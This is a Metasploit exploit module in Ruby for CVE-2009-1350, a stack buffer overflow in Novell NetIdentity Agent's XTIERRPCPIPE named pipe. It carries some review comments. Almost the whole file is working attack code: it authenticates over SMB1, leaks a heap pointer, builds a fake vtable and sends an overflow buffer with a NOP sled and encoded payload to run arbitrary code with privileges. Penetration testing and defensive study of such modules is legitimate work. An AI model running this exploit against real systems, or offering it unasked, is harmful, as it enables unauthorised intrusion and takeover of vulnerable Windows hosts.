##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
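class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::SMB::Client

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending
        a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be
        able to execute arbitrary code. The success of this module is much greater once the
        service has been restarted.
      },
      'Author'         => [ 'MC', 'Ruben Santamarta' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2009-1350' ],
          [ 'OSVDB', '53351' ],
          [ 'BID', '34400' ],
          [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1' ],
        ],
      'DefaultOptions' =>
        {
          # The service is corrupted by the overflow; there is no second attempt
          # without a restart, so the payload should exit the whole process.
          'EXITFUNC' => 'process', # only one shot!
        },
      'Payload'        =>
        {
          'Space'           => 550,
          'BadChars'        => "\x00\x09\x0c\x0b\x20\x0a\x0d\x5c\x5f\x2f\x2e\x40",
          'StackAdjustment' => -3500,
          # and esp, 0xfffffff0 -- realign the stack before the encoded payload runs.
          'PrependEncoder'  => "\x81\xe4\xf0\xff\xff\xff",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # 'Ret' is a placeholder: nothing in this module reads target['Ret'].
          # Every address comes from the heap pointer leaked in mem_leak.
          [ 'Windows 2000 / Windows XP / Windows 2003', { 'Ret' => 0x41414141 } ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => '2009-04-06',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('SMBUser', [ true, 'The username to authenticate as', 'metasploit'], fallbacks: ['USERNAME']),
        OptString.new('SMBPass', [ true, 'The password for the specified username', 'metasploit'], fallbacks: ['PASSWORD'])
      ])

    # This module only speaks SMB1 (see connect(versions: [1]) below), so the
    # protocol-version option would be misleading if left exposed.
    deregister_options('SMB::ProtocolVersion')
  end

  # don't bother with this module for autoexploitation, it creates
  # false-positives on newer systems.
  def autofilter
    false
  end

  # Connect over SMB1, authenticate with SMBUser/SMBPass and open the
  # vulnerable \XTIERRPCPIPE named pipe.
  #
  # Returns the open pipe handle, or nil after printing the error and
  # disconnecting if either the login or the pipe open fails.
  #
  # NOTE(review): the credentials are echoed to the console/log by the status
  # message below; operators capturing output should be aware of that.
  # NOTE(review): `rescue ::Exception` also swallows Interrupt/SignalException
  # (Ctrl-C), and Rex::TimeoutError derives from Interrupt; narrowing this to
  # ::StandardError would hand those to the framework's exploit driver instead
  # of reporting them as a generic "Error:" here -- left unchanged so that
  # failure handling stays identical to the original.
  def open_xtier_pipe
    print_status("Connecting to the server...")
    connect(versions: [1])

    print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")

    begin
      smb_login()
    rescue ::Exception => e
      print_error("Error: #{e}")
      disconnect
      return nil
    end

    print_status("Connecting to named pipe \\XTIERRPCPIPE...")

    # If the pipe doesn't exist, bail.
    begin
      simple.create_pipe('\\XTIERRPCPIPE')
    rescue ::Exception => e
      print_error("Error: #{e}")
      disconnect
      nil
    end
  end

  # Leak a heap pointer from the NetIdentity service and derive the addresses
  # used by the exploit buffer from it.
  #
  # Returns [heap_pointer_leaked, object, method, shellcode], or nil if the
  # connection, login, pipe open or the leak itself fails. Callers that
  # destructure a nil return end up with all-nil locals.
  def mem_leak
    pipe = open_xtier_pipe
    return unless pipe

    # If we get this far, do the dance.
    fid = pipe.file_id

    # Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id
    simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')

    # Send the first request to get our pointer: two dword fields followed by
    # 2040 bytes of filler (2048 bytes total).
    leak = [0x00000004].pack('V') + [0x00000818].pack('V')
    leak << rand_text_alpha_upper(2040)

    print_status("Sending malformed request...")
    pipe.write(leak)

    # The pointer is expected at offset 2060 of the reply. A patched or
    # otherwise non-leaking service can answer with a shorter (or empty)
    # buffer, which previously raised NoMethodError on nil.unpack / nil + 0x700
    # instead of failing cleanly.
    response = pipe.read()
    leaked_bytes = response ? response[2060, 4] : nil
    if leaked_bytes.nil? || leaked_bytes.length < 4
      got = response ? response.length : 0
      print_error("Response too short to contain the leaked pointer (#{got} bytes); target may not be vulnerable")
      pipe.close
      return
    end

    heap_pointer_leaked = leaked_bytes.unpack('V')[0]
    print_status(sprintf("Heap Pointer leaked: 0x%.8x", heap_pointer_leaked))

    # Fixed offsets from the leaked pointer to the fake object, its vtable
    # method slot and the shellcode, as laid out in exploit's buffer.
    print_status("Building fake VTable...")
    object = heap_pointer_leaked + 0x700
    print_status(sprintf("Object: 0x%.8x", object))
    method = object + 0x30
    print_status(sprintf("Method: 0x%.8x", method))
    shellcode = method + 0xA0
    print_status(sprintf("Shellcode: 0x%.8x", shellcode))

    # NOTE(review): only the pipe is closed here; the SMB session stays open
    # and exploit() opens a second one without calling disconnect first --
    # this matches the original behaviour and is left as-is.
    pipe.close

    [heap_pointer_leaked, object, method, shellcode]
  end

  # Leak the heap pointer, build the overflow buffer around the derived
  # addresses and write it to the pipe over a fresh SMB session.
  def exploit
    _heap_pointer_leaked, object, method, shellcode = mem_leak
    return unless shellcode

    # Header (4 dwords), filler, then 32 copies each of the fake object,
    # method and shellcode pointers, a NOP sled, the payload and tail padding.
    sploit = [0x00000002].pack('V')
    sploit << [0x00000000].pack('V')
    sploit << [object].pack('V')
    sploit << [0x00000000].pack('V')
    sploit << rand_text_alpha_upper(240)
    sploit << [object].pack('V') * 32
    sploit << [method].pack('V') * 32
    sploit << [shellcode].pack('V') * 32
    sploit << make_nops(748)
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(110)

    pipe = open_xtier_pipe
    return unless pipe

    # ok, set up and send our exploit buffer...
    fid = pipe.file_id
    simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
    print_status("#{sploit.length} bytes written...")
    pipe.write(sploit)

    handler
    disconnect
  end
end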